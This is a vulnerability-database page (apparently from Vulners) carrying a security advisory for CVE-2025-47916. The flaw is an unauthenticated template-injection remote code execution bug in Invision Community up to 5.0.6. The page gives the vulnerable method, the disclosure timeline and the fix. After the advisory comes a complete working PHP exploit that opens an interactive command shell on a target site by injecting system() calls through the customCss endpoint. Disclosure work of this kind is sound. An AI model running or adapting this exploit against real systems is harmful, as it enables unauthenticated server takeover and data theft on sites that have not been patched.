Vulners
Lucene search
📄 Invision Community 5.0.6 Remote Code Execution
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Exploit for Improper Neutralization of Special Elements Used in a Template Engine in Invisioncommunity | 21 Nov 202513:16 | – | githubexploit |
 | CVE-2025-47916 | 14 May 202512:43 | – | circl |
 | Invision Community 安全漏洞 | 16 May 202500:00 | – | cnnvd |
 | CVE-2025-47916 | 16 May 202500:00 | – | cve |
 | CVE-2025-47916 | 16 May 202500:00 | – | cvelist |
 | Invision Community 5.0.6 customCss RCE | 21 May 202518:53 | – | metasploit |
 | Invision Community <=5.0.6 Unauthenticated RCE via Template Injection | 27 May 202600:33 | – | nuclei |
 | CVE-2025-47916 | 16 May 202515:15 | – | nvd |
 | 📄 Invision Community 5.0.6 CustomCss Remote Code Execution | 22 May 202500:00 | – | packetstorm |
| 📄 Invision Community 5.0.6 customCss Expression Injection | 17 Dec 202500:00 | – | packetstorm |
10
---------------------------------------------------------------------------
Invision Community <= 5.0.6 (customCss) Remote Code Execution Vulnerability
---------------------------------------------------------------------------
[-] Software Link:
https://invisioncommunity.com
[-] Affected Versions:
All versions from 5.0.0 to 5.0.6.
[-] Vulnerability Description:
The vulnerability is located in the
/applications/core/modules/front/system/themeeditor.php script.
Specifically, into the
IPS\core\modules\front\system\themeeditor::customCss() method. This
protected method can be invoked by unauthenticated users and passes the
value of the "content" request parameter to the
Theme::makeProcessFunction() method. As a result, the input is processed by
the template engine. This behavior can be exploited by unauthenticated
attackers to inject and execute arbitrary PHP code by supplying crafted
template strings.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2025-47916.php
Packet Storm Note: PoC appended below
[-] Solution:
Upgrade to version 5.0.7 or later.
[-] Disclosure Timeline:
[10/05/2025] - Vendor notified
[12/05/2025] - Version 5.0.7 released
[12/05/2025] - CVE identifier requested
[14/05/2025] - CVE identifier assigned
[14/05/2025] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2025-47916 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Other References:
https://invisioncommunity.com/release-notes-v5/507-r41/
[-] Original Advisory:
http://karmainsecurity.com/KIS-2025-02
---- proof of concept ----
<?php
/*
---------------------------------------------------------------------------
Invision Community <= 5.0.6 (customCss) Remote Code Execution Vulnerability
---------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://invisioncommunity.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2025-02
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+-------------------------------------------------------------------+";
print "\n| Invision Community <= 5.0.6 Remote Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 2)
{
print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/invision/";
print "\nExample....: php $argv[0] https://invisioncommunity.com/\n\n";
die();
}
$ch = curl_init();
$params = ["app" => "core", "module" => "system", "controller" => "themeeditor", "do" => "customCss"];
curl_setopt($ch, CURLOPT_URL, $argv[1]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
while (1)
{
print "\ninvision-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$params["content"] = sprintf("{expression=\"die('________'.system(base64_decode('%s')))\"}", base64_encode($cmd));
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
preg_match("/(.*)________/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 May 2025 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 3.19.8 - 10
EPSS0.90728
SSVC